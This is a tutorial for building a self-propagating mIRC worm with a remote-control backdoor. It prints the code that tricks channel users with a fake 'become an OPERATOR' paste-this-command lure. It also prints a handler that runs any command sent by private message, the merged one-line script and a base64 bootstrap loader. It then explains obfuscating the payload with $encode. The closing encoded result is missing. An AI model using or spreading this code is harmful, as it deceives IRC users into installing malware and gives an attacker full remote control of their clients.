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Tutorial mIRC Self-Propagating Script

First of all I need to notice you that this script is allows remote controlling the client. This means that people (eventually bots), that have this script running, can be controlled by you via IRC. It is possible for the script to propagate in a natural way.

Get Started

It all starts with the next command:

//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc

This in one line!

Understand the Script

We need to mix these two things:

The Self-Propagating Part (IRC Worm)

on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

Here is #mab the channel you want to let them join if they've installed the script. But since that would not be very efficient in most cases, we can do it in another way. We let it message you. We change the .timer 0 120 .join #mab with .msg mab_ inf. Where mab_ is your nickname.

With this your self replicating and self propagating script has started, it will now try to spread the script, it will try to personal message some people saying 'itself', while ignoring people. Done that it will try to send itself to other users, and tell them to type the command.

Now we are going to change some things about it so the functionality of the control script is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the script user. Once the script is implemented that is not the objective, so we will remove that from the script. So after this changes we get the next script that we have to merge with the remote control script:

on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }

The Remote Access (control) Part

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Mixed they will give us the self propagating remote control script. This means that the script will spread itself, join the certain channel (here: #mab) and after that it will spread itself, and next to that wait for you to control it remotely. So you will have the ability to obtain complete remote access to the client, using mIRC.

I will now try to give more details about that script. So you truly understand this script. In this way it can be easily modified. I will mix it.

So basically we want to mix these two “mechanisms”:

on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }


on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE

In one line:

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }

Where here is DO SOMETHING the remote control part's work and DO SOMETHING ELSE the self propagating part's work.

Integrated (Two parts joined together):

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }

Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?

//echo -a $asc(char here)

If this gives a bad result this means that the char must be written in another way.

Example encoding of “,”:

//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct


$+ = pasting two strings together

| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)

Sometimes this method is not needed.

For finding the numbers you use this:

//echo -a $asc($?)

This will pop up an input box, just fill in the char and you’ll get the number as result.

It's possible to $encoding now, without bugs. So this is what we get before we start encoding:

on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125)


//say $encode(on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125),m)

For finding the $encoded variable we split it up as global variables. The variables are set with

/set %var STRING

So for finding it we write the next in mIRC:

//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)

But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line.

We find the next as result:


This is the encoded command in one line of code.

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